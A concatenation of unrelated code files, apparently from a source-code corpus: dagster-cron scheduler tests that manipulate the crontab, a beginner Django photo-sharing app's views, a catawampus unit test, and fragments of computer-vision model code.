lower_right_of_second_box = [nn_out[j]["bboxReal"][2],nn_out[j]["bboxReal"][1],nn_out[j]["centroidReal"][3]]
upper_left_of_second_box = [nn_out[j]["bboxReal"][0],nn_out[j]["bboxReal"][3],nn_out[j]["centroidReal"][3]]
upper_right_of_second_box = [nn_out[j]["bboxReal"][2],nn_out[j]["bboxReal"][3],nn_out[j]["centroidReal"][3]]
l1 = self.calculate_distance_of_two_points_of_boxes(lower_left_of_first_box, lower_left_of_second_box)
l2 = self.calculate_distance_of_two_points_of_boxes(lower_right_of_first_box, lower_right_of_second_box)
l3 = self.calculate_distance_of_two_points_of_boxes(upper_left_of_first_box, upper_left_of_second_box)
l4 = self.calculate_distance_of_two_points_of_boxes(upper_right_of_first_box, upper_right_of_second_box)
l = min(l1, l2, l3, l4)
elif ( self.dist_method == 'CenterPointsDistance' ):
center_of_first_box = [nn_out[i]["centroidReal"][0],nn_out[i]["centroidReal"][1],nn_out[i]["centroidReal"][3]]
center_of_second_box = [nn_out[j]["centroidReal"][0],nn_out[j]["centroidReal"][1],nn_out[j]["centroidReal"][3]]
l = self.calculate_distance_of_two_points_of_boxes(center_of_first_box, center_of_second_box)
distance_row.append(l)
distances.append(distance_row)
distances_asarray = np.asarray(distances, dtype=np.float32)
return distances_asarray
|
<filename>python_modules/libraries/dagster-cron/dagster_cron_tests/test_cron_scheduler.py<gh_stars>0
import os
import re
import subprocess
import sys
from contextlib import contextmanager
from tempfile import TemporaryDirectory
import pytest
import yaml
from dagster import ScheduleDefinition
from dagster.core.definitions import lambda_solid, pipeline, repository
from dagster.core.host_representation import (
ManagedGrpcPythonEnvRepositoryLocationOrigin,
RepositoryLocation,
RepositoryLocationHandle,
)
from dagster.core.instance import DagsterInstance, InstanceType
from dagster.core.launcher.sync_in_memory_run_launcher import SyncInMemoryRunLauncher
from dagster.core.run_coordinator import DefaultRunCoordinator
from dagster.core.scheduler.job import JobState, JobStatus, JobType, ScheduleJobData
from dagster.core.scheduler.scheduler import (
DagsterScheduleDoesNotExist,
DagsterScheduleReconciliationError,
DagsterSchedulerError,
)
from dagster.core.storage.event_log import InMemoryEventLogStorage
from dagster.core.storage.noop_compute_log_manager import NoOpComputeLogManager
from dagster.core.storage.pipeline_run import PipelineRunStatus
from dagster.core.storage.root import LocalArtifactStorage
from dagster.core.storage.runs import InMemoryRunStorage
from dagster.core.storage.schedules import SqliteScheduleStorage
from dagster.core.test_utils import environ
from dagster.core.types.loadable_target_origin import LoadableTargetOrigin
from dagster.seven import get_current_datetime_in_utc, get_timestamp_from_utc_datetime
from dagster_cron import SystemCronScheduler
from freezegun import freeze_time
@pytest.fixture(scope="function")
def restore_cron_tab():
with TemporaryDirectory() as tempdir:
crontab_backup = os.path.join(tempdir, "crontab_backup.txt")
with open(crontab_backup, "wb+") as f:
try:
output = subprocess.check_output(["crontab", "-l"])
f.write(output)
except subprocess.CalledProcessError:
# If a crontab hasn't been created yet, the command fails with a
# non-zero error code
pass
try:
subprocess.check_output(["crontab", "-r"])
except subprocess.CalledProcessError:
# If a crontab hasn't been created yet, the command fails with a
# non-zero error code
pass
yield
subprocess.check_output(["crontab", crontab_backup])
@pytest.fixture(scope="function")
def unset_dagster_home():
old_env = os.getenv("DAGSTER_HOME")
if old_env is not None:
del os.environ["DAGSTER_HOME"]
yield
if old_env is not None:
os.environ["DAGSTER_HOME"] = old_env
@pipeline
def no_config_pipeline():
@lambda_solid
def return_hello():
return "Hello"
return return_hello()
schedules_dict = {
"no_config_pipeline_daily_schedule": ScheduleDefinition(
name="no_config_pipeline_daily_schedule",
cron_schedule="0 0 * * *",
pipeline_name="no_config_pipeline",
run_config={"intermediate_storage": {"filesystem": None}},
),
"no_config_pipeline_every_min_schedule": ScheduleDefinition(
name="no_config_pipeline_every_min_schedule",
cron_schedule="* * * * *",
pipeline_name="no_config_pipeline",
run_config={"intermediate_storage": {"filesystem": None}},
),
"default_config_pipeline_every_min_schedule": ScheduleDefinition(
name="default_config_pipeline_every_min_schedule",
cron_schedule="* * * * *",
pipeline_name="no_config_pipeline",
),
}
def define_schedules():
return list(schedules_dict.values())
@repository
def test_repository():
if os.getenv("DAGSTER_TEST_SMALL_REPO"):
return [no_config_pipeline] + list(
filter(
lambda x: not x.name == "default_config_pipeline_every_min_schedule",
define_schedules(),
)
)
return [no_config_pipeline] + define_schedules()
@contextmanager
def get_test_external_repo():
with RepositoryLocationHandle.create_from_repository_location_origin(
ManagedGrpcPythonEnvRepositoryLocationOrigin(
loadable_target_origin=LoadableTargetOrigin(
executable_path=sys.executable, python_file=__file__, attribute="test_repository",
),
location_name="test_location",
)
) as handle:
yield RepositoryLocation.from_handle(handle).get_repository("test_repository")
@contextmanager
def get_smaller_external_repo():
with environ({"DAGSTER_TEST_SMALL_REPO": "1"}):
with get_test_external_repo() as repo:
yield repo
def get_cron_jobs():
output = subprocess.check_output(["crontab", "-l"])
return list(filter(None, output.decode("utf-8").strip().split("\n")))
def define_scheduler_instance(tempdir):
return DagsterInstance(
instance_type=InstanceType.EPHEMERAL,
local_artifact_storage=LocalArtifactStorage(tempdir),
run_storage=InMemoryRunStorage(),
event_storage=InMemoryEventLogStorage(),
compute_log_manager=NoOpComputeLogManager(),
schedule_storage=SqliteScheduleStorage.from_local(os.path.join(tempdir, "schedules")),
scheduler=SystemCronScheduler(),
run_coordinator=DefaultRunCoordinator(),
run_launcher=SyncInMemoryRunLauncher(),
)
def test_init(restore_cron_tab): # pylint:disable=unused-argument,redefined-outer-name
with TemporaryDirectory() as tempdir:
instance = define_scheduler_instance(tempdir)
with get_test_external_repo() as external_repository:
# Initialize scheduler
instance.reconcile_scheduler_state(external_repository)
# Check schedules are saved to disk
assert "schedules" in os.listdir(tempdir)
assert instance.all_stored_job_state(job_type=JobType.SCHEDULE)
@freeze_time("2019-02-27")
def test_re_init(restore_cron_tab): # pylint:disable=unused-argument,redefined-outer-name
with TemporaryDirectory() as tempdir:
instance = define_scheduler_instance(tempdir)
with get_test_external_repo() as external_repo:
now = get_current_datetime_in_utc()
# Start schedule
schedule_state = instance.start_schedule_and_update_storage_state(
external_repo.get_external_schedule("no_config_pipeline_every_min_schedule")
)
assert (
schedule_state.job_specific_data.start_timestamp
== get_timestamp_from_utc_datetime(now)
)
# Check schedules are saved to disk
assert "schedules" in os.listdir(tempdir)
schedule_states = instance.all_stored_job_state(job_type=JobType.SCHEDULE)
for state in schedule_states:
if state.name == "no_config_pipeline_every_min_schedule":
assert state == schedule_state
@pytest.mark.parametrize("do_initial_reconcile", [True, False])
def test_start_and_stop_schedule(
restore_cron_tab, do_initial_reconcile,
): # pylint:disable=unused-argument,redefined-outer-name
with TemporaryDirectory() as tempdir:
instance = define_scheduler_instance(tempdir)
with get_test_external_repo() as external_repo:
if do_initial_reconcile:
instance.reconcile_scheduler_state(external_repo)
schedule = external_repo.get_external_schedule("no_config_pipeline_every_min_schedule")
schedule_origin_id = schedule.get_external_origin_id()
instance.start_schedule_and_update_storage_state(schedule)
assert "schedules" in os.listdir(tempdir)
assert "{}.sh".format(schedule_origin_id) in os.listdir(
os.path.join(tempdir, "schedules", "scripts")
)
instance.stop_schedule_and_update_storage_state(schedule_origin_id)
assert "{}.sh".format(schedule_origin_id) not in os.listdir(
os.path.join(tempdir, "schedules", "scripts")
)
def test_start_non_existent_schedule(
restore_cron_tab,
): # pylint:disable=unused-argument,redefined-outer-name
with TemporaryDirectory() as tempdir:
instance = define_scheduler_instance(tempdir)
with pytest.raises(DagsterScheduleDoesNotExist):
instance.stop_schedule_and_update_storage_state("asdf")
@pytest.mark.parametrize("do_initial_reconcile", [True, False])
def test_start_schedule_cron_job(
do_initial_reconcile, restore_cron_tab,
): # pylint:disable=unused-argument,redefined-outer-name
with TemporaryDirectory() as tempdir:
instance = define_scheduler_instance(tempdir)
with get_test_external_repo() as external_repo:
if do_initial_reconcile:
instance.reconcile_scheduler_state(external_repo)
instance.start_schedule_and_update_storage_state(
external_repo.get_external_schedule("no_config_pipeline_every_min_schedule")
)
instance.start_schedule_and_update_storage_state(
external_repo.get_external_schedule("no_config_pipeline_daily_schedule")
)
instance.start_schedule_and_update_storage_state(
external_repo.get_external_schedule("default_config_pipeline_every_min_schedule")
)
# Inspect the cron tab
cron_jobs = get_cron_jobs()
assert len(cron_jobs) == 3
external_schedules_dict = {
external_repo.get_external_schedule(name).get_external_origin_id(): schedule_def
for name, schedule_def in schedules_dict.items()
}
for cron_job in cron_jobs:
match = re.findall(r"^(.*?) (/.*) > (.*) 2>&1 # dagster-schedule: (.*)", cron_job)
cron_schedule, command, log_file, schedule_origin_id = match[0]
schedule_def = external_schedules_dict[schedule_origin_id]
# Check cron schedule matches
if schedule_def.cron_schedule == "0 0 * * *":
assert cron_schedule == "@daily"
else:
assert cron_schedule == schedule_def.cron_schedule
# Check bash file exists
assert os.path.isfile(command)
# Check log file is correct
assert log_file.endswith("scheduler.log")
def test_remove_schedule_def(
restore_cron_tab,
): # pylint:disable=unused-argument,redefined-outer-name
with TemporaryDirectory() as tempdir:
instance = define_scheduler_instance(tempdir)
with get_test_external_repo() as external_repo:
instance.reconcile_scheduler_state(external_repo)
assert len(instance.all_stored_job_state(job_type=JobType.SCHEDULE)) == 3
with get_smaller_external_repo() as smaller_repo:
instance.reconcile_scheduler_state(smaller_repo)
assert len(instance.all_stored_job_state(job_type=JobType.SCHEDULE)) == 2
def test_add_schedule_def(restore_cron_tab): # pylint:disable=unused-argument,redefined-outer-name
with TemporaryDirectory() as tempdir:
instance = define_scheduler_instance(tempdir)
with get_smaller_external_repo() as external_repo:
# Start all schedule and verify cron tab, schedule storage, and errors
instance.start_schedule_and_update_storage_state(
external_repo.get_external_schedule("no_config_pipeline_daily_schedule")
)
instance.start_schedule_and_update_storage_state(
external_repo.get_external_schedule("no_config_pipeline_every_min_schedule")
)
assert len(instance.all_stored_job_state(job_type=JobType.SCHEDULE)) == 2
assert len(get_cron_jobs()) == 2
assert len(instance.scheduler_debug_info().errors) == 0
with get_test_external_repo() as external_repo:
# Reconcile with an additional schedule added
instance.reconcile_scheduler_state(external_repo)
assert len(instance.all_stored_job_state(job_type=JobType.SCHEDULE)) == 3
assert len(get_cron_jobs()) == 2
assert len(instance.scheduler_debug_info().errors) == 0
instance.start_schedule_and_update_storage_state(
external_repo.get_external_schedule("default_config_pipeline_every_min_schedule")
)
assert len(instance.all_stored_job_state(job_type=JobType.SCHEDULE)) == 3
assert len(get_cron_jobs()) == 3
assert len(instance.scheduler_debug_info().errors) == 0
def test_start_and_stop_schedule_cron_tab(
restore_cron_tab,
): # pylint:disable=unused-argument,redefined-outer-name
with TemporaryDirectory() as tempdir:
instance = define_scheduler_instance(tempdir)
with get_test_external_repo() as external_repo:
# Start schedule
instance.start_schedule_and_update_storage_state(
external_repo.get_external_schedule("no_config_pipeline_every_min_schedule")
)
cron_jobs = get_cron_jobs()
assert len(cron_jobs) == 1
# Try starting it again
with pytest.raises(DagsterSchedulerError):
instance.start_schedule_and_update_storage_state(
external_repo.get_external_schedule("no_config_pipeline_every_min_schedule")
)
cron_jobs = get_cron_jobs()
assert len(cron_jobs) == 1
# Start another schedule
instance.start_schedule_and_update_storage_state(
external_repo.get_external_schedule("no_config_pipeline_daily_schedule")
)
cron_jobs = get_cron_jobs()
assert len(cron_jobs) == 2
# Stop second schedule
instance.stop_schedule_and_update_storage_state(
external_repo.get_external_schedule(
"no_config_pipeline_daily_schedule"
).get_external_origin_id()
)
cron_jobs = get_cron_jobs()
assert len(cron_jobs) == 1
# Try stopping second schedule again
instance.stop_schedule_and_update_storage_state(
external_repo.get_external_schedule(
"no_config_pipeline_daily_schedule"
).get_external_origin_id()
)
cron_jobs = get_cron_jobs()
assert len(cron_jobs) == 1
# Start second schedule
instance.start_schedule_and_update_storage_state(
external_repo.get_external_schedule("no_config_pipeline_daily_schedule")
)
cron_jobs = get_cron_jobs()
assert len(cron_jobs) == 2
# Reconcile schedule state, should be in the same state
instance.reconcile_scheduler_state(external_repo)
cron_jobs = get_cron_jobs()
assert len(cron_jobs) == 2
instance.start_schedule_and_update_storage_state(
external_repo.get_external_schedule("default_config_pipeline_every_min_schedule")
)
cron_jobs = get_cron_jobs()
assert len(cron_jobs) == 3
# Reconcile schedule state, should be in the same state
instance.reconcile_scheduler_state(external_repo)
cron_jobs = get_cron_jobs()
assert len(cron_jobs) == 3
# Stop all schedules
instance.stop_schedule_and_update_storage_state(
external_repo.get_external_schedule(
"no_config_pipeline_every_min_schedule"
).get_external_origin_id()
)
instance.stop_schedule_and_update_storage_state(
external_repo.get_external_schedule(
"no_config_pipeline_daily_schedule"
).get_external_origin_id()
)
instance.stop_schedule_and_update_storage_state(
external_repo.get_external_schedule(
"default_config_pipeline_every_min_schedule"
).get_external_origin_id()
)
cron_jobs = get_cron_jobs()
assert len(cron_jobs) == 0
# Reconcile schedule state, should be in the same state
instance.reconcile_scheduler_state(external_repo)
cron_jobs = get_cron_jobs()
assert len(cron_jobs) == 0
def test_script_execution(
restore_cron_tab, unset_dagster_home
): # pylint:disable=unused-argument,redefined-outer-name
with TemporaryDirectory() as tempdir:
os.environ["DAGSTER_HOME"] = tempdir
config = {
"scheduler": {"module": "dagster_cron", "class": "SystemCronScheduler", "config": {}},
# This needs to synchronously execute to completion when
# the generated bash script is invoked
"run_launcher": {
"module": "dagster.core.launcher.sync_in_memory_run_launcher",
"class": "SyncInMemoryRunLauncher",
},
}
with open(os.path.join(tempdir, "dagster.yaml"), "w+") as f:
f.write(yaml.dump(config))
instance = DagsterInstance.get()
with get_test_external_repo() as external_repo:
instance.start_schedule_and_update_storage_state(
external_repo.get_external_schedule("no_config_pipeline_every_min_schedule")
)
schedule_origin_id = external_repo.get_external_schedule(
"no_config_pipeline_every_min_schedule"
).get_external_origin_id()
script = instance.scheduler._get_bash_script_file_path( # pylint: disable=protected-access
instance, schedule_origin_id
)
subprocess.check_output([script], shell=True, env={"DAGSTER_HOME": tempdir})
runs = instance.get_runs()
assert len(runs) == 1
assert runs[0].status == PipelineRunStatus.SUCCESS
def test_start_schedule_fails(
restore_cron_tab,
): # pylint:disable=unused-argument,redefined-outer-name
with TemporaryDirectory() as tempdir:
instance = define_scheduler_instance(tempdir)
with get_test_external_repo() as external_repo:
def raises(*args, **kwargs):
raise Exception("Patch")
instance._scheduler._start_cron_job = raises # pylint: disable=protected-access
with pytest.raises(Exception, match="Patch"):
instance.start_schedule_and_update_storage_state(
external_repo.get_external_schedule("no_config_pipeline_every_min_schedule")
)
schedule = instance.get_job_state(
external_repo.get_external_schedule(
"no_config_pipeline_every_min_schedule"
).get_external_origin_id()
)
assert schedule.status == JobStatus.STOPPED
def test_start_schedule_unsuccessful(
restore_cron_tab,
): # pylint:disable=unused-argument,redefined-outer-name
with TemporaryDirectory() as tempdir:
instance = define_scheduler_instance(tempdir)
with get_test_external_repo() as external_repo:
def do_nothing(*_):
pass
instance._scheduler._start_cron_job = do_nothing # pylint: disable=protected-access
# End schedule
with pytest.raises(
DagsterSchedulerError,
match="Attempted to write cron job for schedule no_config_pipeline_every_min_schedule, "
"but failed. The scheduler is not running no_config_pipeline_every_min_schedule.",
):
instance.start_schedule_and_update_storage_state(
external_repo.get_external_schedule("no_config_pipeline_every_min_schedule")
)
def test_start_schedule_manual_delete_debug(
restore_cron_tab, snapshot # pylint:disable=unused-argument,redefined-outer-name
):
with TemporaryDirectory() as tempdir:
instance = define_scheduler_instance(tempdir)
with get_test_external_repo() as external_repo:
instance.start_schedule_and_update_storage_state(
external_repo.get_external_schedule("no_config_pipeline_every_min_schedule")
)
# Manually delete the schedule from the crontab
instance.scheduler._end_cron_job( # pylint: disable=protected-access
instance,
external_repo.get_external_schedule(
"no_config_pipeline_every_min_schedule"
).get_external_origin_id(),
)
# Check debug command
debug_info = instance.scheduler_debug_info()
assert len(debug_info.errors) == 1
# Reconcile should fix error
instance.reconcile_scheduler_state(external_repo)
debug_info = instance.scheduler_debug_info()
assert len(debug_info.errors) == 0
def test_start_schedule_manual_add_debug(
restore_cron_tab, snapshot # pylint:disable=unused-argument,redefined-outer-name
):
with TemporaryDirectory() as tempdir:
instance = define_scheduler_instance(tempdir)
with get_test_external_repo() as external_repo:
# Initialize scheduler
instance.reconcile_scheduler_state(external_repo)
# Manually add the schedule from to the crontab
instance.scheduler._start_cron_job( # pylint: disable=protected-access
instance,
external_repo.get_external_schedule("no_config_pipeline_every_min_schedule"),
)
# Check debug command
debug_info = instance.scheduler_debug_info()
assert len(debug_info.errors) == 1
# Reconcile should fix error
instance.reconcile_scheduler_state(external_repo)
debug_info = instance.scheduler_debug_info()
assert len(debug_info.errors) == 0
def test_start_schedule_manual_duplicate_schedules_add_debug(
restore_cron_tab, snapshot # pylint:disable=unused-argument,redefined-outer-name
):
with TemporaryDirectory() as tempdir:
instance = define_scheduler_instance(tempdir)
with get_test_external_repo() as external_repo:
external_schedule = external_repo.get_external_schedule(
"no_config_pipeline_every_min_schedule"
)
instance.start_schedule_and_update_storage_state(external_schedule)
# Manually add extra cron tabs
instance.scheduler._start_cron_job( # pylint: disable=protected-access
instance, external_schedule,
)
instance.scheduler._start_cron_job( # pylint: disable=protected-access
instance, external_schedule,
)
# Check debug command
debug_info = instance.scheduler_debug_info()
assert len(debug_info.errors) == 1
# Reconcile should fix error
instance.reconcile_scheduler_state(external_repo)
debug_info = instance.scheduler_debug_info()
assert len(debug_info.errors) == 0
def test_stop_schedule_fails(
restore_cron_tab, # pylint:disable=unused-argument,redefined-outer-name
):
with TemporaryDirectory() as tempdir:
instance = define_scheduler_instance(tempdir)
with get_test_external_repo() as external_repo:
external_schedule = external_repo.get_external_schedule(
"no_config_pipeline_every_min_schedule"
)
schedule_origin_id = external_schedule.get_external_origin_id()
def raises(*args, **kwargs):
raise Exception("Patch")
instance._scheduler._end_cron_job = raises # pylint: disable=protected-access
instance.start_schedule_and_update_storage_state(external_schedule)
assert "schedules" in os.listdir(tempdir)
assert "{}.sh".format(schedule_origin_id) in os.listdir(
os.path.join(tempdir, "schedules", "scripts")
)
# End schedule
with pytest.raises(Exception, match="Patch"):
instance.stop_schedule_and_update_storage_state(schedule_origin_id)
schedule = instance.get_job_state(schedule_origin_id)
assert schedule.status == JobStatus.RUNNING
def test_stop_schedule_unsuccessful(
restore_cron_tab,
): # pylint:disable=unused-argument,redefined-outer-name
with TemporaryDirectory() as tempdir:
instance = define_scheduler_instance(tempdir)
with get_test_external_repo() as external_repo:
def do_nothing(*_):
pass
instance._scheduler._end_cron_job = do_nothing # pylint: disable=protected-access
instance.start_schedule_and_update_storage_state(
external_repo.get_external_schedule("no_config_pipeline_every_min_schedule")
)
# End schedule
with pytest.raises(
DagsterSchedulerError,
match="Attempted to remove existing cron job for schedule "
"no_config_pipeline_every_min_schedule, but failed. There are still 1 jobs running for "
"the schedule.",
):
instance.stop_schedule_and_update_storage_state(
external_repo.get_external_schedule(
"no_config_pipeline_every_min_schedule"
).get_external_origin_id()
)
def test_wipe(restore_cron_tab): # pylint:disable=unused-argument,redefined-outer-name
with TemporaryDirectory() as tempdir:
instance = define_scheduler_instance(tempdir)
with get_test_external_repo() as external_repo:
# Start schedule
instance.start_schedule_and_update_storage_state(
external_repo.get_external_schedule("no_config_pipeline_every_min_schedule")
)
# Wipe scheduler
instance.wipe_all_schedules()
# Check schedules are wiped
assert instance.all_stored_job_state(job_type=JobType.SCHEDULE) == []
def test_log_directory(restore_cron_tab): # pylint:disable=unused-argument,redefined-outer-name
with TemporaryDirectory() as tempdir:
instance = define_scheduler_instance(tempdir)
with get_test_external_repo() as external_repo:
external_schedule = external_repo.get_external_schedule(
"no_config_pipeline_every_min_schedule"
)
schedule_log_path = instance.logs_path_for_schedule(
external_schedule.get_external_origin_id()
)
assert schedule_log_path.endswith(
"/schedules/logs/{schedule_origin_id}/scheduler.log".format(
schedule_origin_id=external_schedule.get_external_origin_id()
)
)
# Start schedule
instance.start_schedule_and_update_storage_state(external_schedule)
# Wipe scheduler
instance.wipe_all_schedules()
# Check schedules are wiped
assert instance.all_stored_job_state(job_type=JobType.SCHEDULE) == []
def test_reconcile_failure(restore_cron_tab): # pylint:disable=unused-argument,redefined-outer-name
with TemporaryDirectory() as tempdir:
instance = define_scheduler_instance(tempdir)
with get_test_external_repo() as external_repo:
instance.reconcile_scheduler_state(external_repo)
instance.start_schedule_and_update_storage_state(
external_repo.get_external_schedule("no_config_pipeline_every_min_schedule")
)
def failed_start_job(*_):
raise DagsterSchedulerError("Failed to start")
def failed_end_job(*_):
raise DagsterSchedulerError("Failed to stop")
instance._scheduler.start_schedule = ( # pylint: disable=protected-access
failed_start_job
)
instance._scheduler.stop_schedule = failed_end_job # pylint: disable=protected-access
with pytest.raises(
DagsterScheduleReconciliationError,
match="Error 1: Failed to stop\n Error 2: Failed to stop\n Error 3: Failed to stop",
):
instance.reconcile_scheduler_state(external_repo)
@freeze_time("2019-02-27")
def test_reconcile_schedule_without_start_time():
with TemporaryDirectory() as tempdir:
instance = define_scheduler_instance(tempdir)
with get_test_external_repo() as external_repo:
external_schedule = external_repo.get_external_schedule(
"no_config_pipeline_daily_schedule"
)
legacy_schedule_state = JobState(
external_schedule.get_external_origin(),
JobType.SCHEDULE,
JobStatus.RUNNING,
ScheduleJobData(external_schedule.cron_schedule, None),
)
instance.add_job_state(legacy_schedule_state)
instance.reconcile_scheduler_state(external_repository=external_repo)
reconciled_schedule_state = instance.get_job_state(
external_schedule.get_external_origin_id()
)
assert reconciled_schedule_state.status == JobStatus.RUNNING
assert (
reconciled_schedule_state.job_specific_data.start_timestamp
== get_timestamp_from_utc_datetime(get_current_datetime_in_utc())
)
def test_reconcile_failure_when_deleting_schedule_def(
restore_cron_tab,
): # pylint:disable=unused-argument,redefined-outer-name
with TemporaryDirectory() as tempdir:
instance = define_scheduler_instance(tempdir)
with get_test_external_repo() as external_repo:
instance.reconcile_scheduler_state(external_repo)
assert len(instance.all_stored_job_state(job_type=JobType.SCHEDULE)) == 3
def failed_end_job(*_):
raise DagsterSchedulerError("Failed to stop")
instance._scheduler.stop_schedule_and_delete_from_storage = ( # pylint: disable=protected-access
failed_end_job
)
with pytest.raises(
DagsterScheduleReconciliationError, match="Error 1: Failed to stop",
):
with get_smaller_external_repo() as smaller_repo:
instance.reconcile_scheduler_state(smaller_repo)
|
from django.http import HttpResponse, Http404, HttpResponseRedirect
from django.shortcuts import render, redirect, get_object_or_404
from django.contrib.auth.decorators import login_required
from django.contrib.auth import login, authenticate, logout
from django.contrib.sites.shortcuts import get_current_site
from django.utils.http import urlsafe_base64_encode #encypt token to base64
from django.utils.encoding import force_bytes, force_text
from django.template.loader import render_to_string
from django.contrib.auth.models import User
from .models import Image, Profile, Comment, Likes, Followers
from .forms import FormSignUp,FormLogin,ProfileForm,FormImage, CommentForm
from django.conf import settings
import os
# Create your views here.
def index(request):
imagess = Image.get_images()
return render(request, 'home.html', {"images":imagess})
def signingup(request):
if request.method == 'POST':
form = FormSignUp(request.POST)
if form.is_valid():
user = form.save(commit = False)
user.is_active = False
user.save()
current = get_current_site(request)
'''
subject = 'Activate your iNsTa'
message = render_to_string('email/email.html', {
'user': user,
'domain': current.domain,
'uid': urlsafe_base64_encode(force_bytes(user.pk)),
'token': account_activation_token.make_token(user)
})
user.email_user(subject, message)
return 'We have just sent you an email'
'''
else:
form = FormSignUp()
return render(request, 'django_registration/registration_form.html', {'form': form})
@login_required(login_url='/login')
def profile(request):
#print(request)
'''
function to create user profile
'''
current_user = request.user
if request.method=="POST":
form = ProfileForm(request.POST,request.FILES)
if form.is_valid():
profile =form.save(commit=False)
profile.user = current_user
profile.save()
return redirect(updatedprofile)
else:
form = ProfileForm()
return render(request, 'profile.html',{"form":form})
@login_required(login_url='/login')
def updatedprofile(request, username):
'''
funcion to display user profile
'''
current_user = request.user
user_id = current_user.id
#userr = get_object_or_404(User, username=username)
profile = Profile.objects.filter(id=user_id).all()
#images = Image.objects.filter(profile_id=current_user.profile.id).all()
#user_posts = userr.profile.posts.all()
#if request.user == userr:
#return redirect('updatedprofile', username=request.user.username)
return render(request, 'viewprofile.html', {"profile":profile})
@login_required(login_url='/login')
def uploadimage(request):
'''
view function to post images
'''
user = User.objects.exclude(id=request.user.id)
current_user = request.user
if request.method=='POST':
form = FormImage(request.POST, request.FILES)
if form.is_valid():
image = form.save(commit=False)
#image.user = request.user.profile
image.save()
return redirect(index)
else:
form = FormImage()
return render(request, 'uploadimage.html',{"form":form})
def search(request):
if 'user' in request.GET and request.GET['user']:
search_user = request.GET.get('user')
username_searched = Profile.search_by_profile(search_user)
message = f'{search_user}'
return render(request, 'search.html',{"users":username_searched, "message":message})
def specific(request, img_id):
'''
view function to show details of a single image
'''
image = Image.objects.get(pk=img_id)
# likes = image.like_set.all().count()
comments = Comment.objects.filter(image_id=img_id).all()
return render(request,'singleimage.html',{"image":image, "comments":comments, "likes":likes})
def comment(request, id):
'''
view for the render form
'''
current_user = request.user
image = Image.objects.get(pk=id)
if request.method=='POST':
form = CommentForm(request.POST)
if form.is_valid():
comment = form.save(commit=False)
comment.user_id = current_user
comment.image_id = image
comment.save_comment()
return redirect(index)
else:
form= CommentForm()
return render(request, 'comment.html', {"form":form, "image":image})
def likes(request, img_id):
current_user = request.user
current_image = Image.objects.get(pk=img_id)
likey= Likes.objects.create(user=current_user, image=current_image)
return redirect(index)
def login(request):
'''
view function to display login form
'''
if request.method=='POST':
form = FormLogin(request.POST)
if form.is_valid():
username = form.cleaned_data['Username']
password = form.cleaned_data['Password']
user = authenticate(username,password)
if user.is_active:
login(request,user)
print("You have logged into your account")
return redirect(index)
else:
return HttpResponse("Your account is inactive")
else:
form = FormLogin()
return render(request, 'registration/login.html',{"form":form})
def logout_view(request):
logout(request)
return redirect(index) |
<filename>dm/catawampus_test.py
#!/usr/bin/python
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# unittest requires method names starting in 'test'
# pylint:disable=invalid-name
"""Unit tests for catawampus.py implementation."""
__author__ = '<EMAIL> (<NAME>)'
import google3
from tr.wvtest import unittest
import dm.periodic_statistics
import tr.api
import tr.core
import tr.experiment
import tr.handle
import catawampus
class CatawampusTest(unittest.TestCase):
"""Tests for catawampus.py."""
def testValidateExports(self):
r = tr.core.Exporter()
h = tr.experiment.ExperimentHandle(r)
c = catawampus.CatawampusDm(h)
tr.handle.ValidateExports(c)
def testRuntimeEnv(self):
r = tr.core.Exporter()
h = tr.experiment.ExperimentHandle(r)
c = catawampus.CatawampusDm(h)
self.assertTrue(c.RuntimeEnvInfo)
def testProfiler(self):
r = tr.core.Exporter()
h = tr.experiment.ExperimentHandle(r)
c = catawampus.CatawampusDm(h)
c.Profiler.Enable = True
# Profiler is running. Need something to profile.
unused_j = 0
for i in range(1000):
unused_j += i
c.Profiler.Enable = False
# We don't check the content (too fragile for a test), just that it
# generated *something*
self.assertTrue(c.Profiler.Result)
def testExpensiveStuffEnable(self):
r = tr.core.Exporter()
h = tr.experiment.ExperimentHandle(r)
c = catawampus.CatawampusDm(h)
self.assertFalse(tr.api.ExpensiveNotificationsEnable)
self.assertFalse(dm.periodic_statistics.ExpensiveStatsEnable)
c.ExpensiveStuff.Enable = True
self.assertTrue(tr.api.ExpensiveNotificationsEnable)
self.assertTrue(dm.periodic_statistics.ExpensiveStatsEnable)
c.ExpensiveStuff.Enable = False
self.assertFalse(tr.api.ExpensiveNotificationsEnable)
self.assertFalse(dm.periodic_statistics.ExpensiveStatsEnable)
def testExpensiveStuff(self):
r = tr.core.Exporter()
h = tr.experiment.ExperimentHandle(r)
c = catawampus.CatawampusDm(h)
for i in range(1, 100):
name = 'foo%d' % i
tr.api.ExpensiveNotifications[name] = 100 - i
dm.periodic_statistics.ExpensiveStats[name] = 100 - i
for i in range(1, 41):
name = 'foo%d' % i
self.assertTrue(name in c.ExpensiveStuff.Stats)
self.assertTrue(name in c.ExpensiveStuff.Notifications)
for i in range(41, 100):
name = 'foo%d' % i
self.assertFalse(name in c.ExpensiveStuff.Stats)
self.assertFalse(name in c.ExpensiveStuff.Notifications)
if __name__ == '__main__':
unittest.main()
|
"""Adapted from MoCo implementation of PytorchLightning/lightning-bolts"""
from typing import Union, List, Tuple
import torch
from torch import nn
from torch.nn import functional as F
import pytorch_lightning as pl
from pl_bolts.metrics import mean, precision_at_k
# from torchmetrics import IoU
from .resnet import BasicBlock, Bottleneck
from .deeplab import ASPP
from .metrics.iou import IoU
from .utils.scheduler import WarmupConstantSchedule
class SiameseNet(pl.LightningModule):
def __init__(
self,
base_encoder: Union[str, torch.nn.Module] = "resnet101",
num_classes: int = 12,
emb_dim: int = 128,
emb_depth: int = 1,
fc_dim: int = 512,
num_patches: int = 1,
learning_rate: float = 0.1,
momentum: float = 0.9,
weight_decay: float = 5e-4,
batch_size: int = 32,
stages: Union[List, Tuple] = (3, 4),
siamese: bool = True,
flip_on_validation: bool = False,
apool: bool = True,
warmup_iters: int = 1,
contrastive_loss=None,
*args,
**kwargs,
):
"""
Args:
base_encoder: base network which consists siamese network
num_classes: # of classes
emb_dim: projector dimension which will be used for calculating contrastive loss
emb_depth: projector depth
learning_rate: the learning rate
momentum: optimizer momentum
weight_decay: optimizer weight decay
batch_size: batch size
stages: base encoder (resnet) stages to calculate contrastive loss
siamese: whether or not to use contrastive loss
flip_on_validation: on validation, use the mean classification result of two flipped image
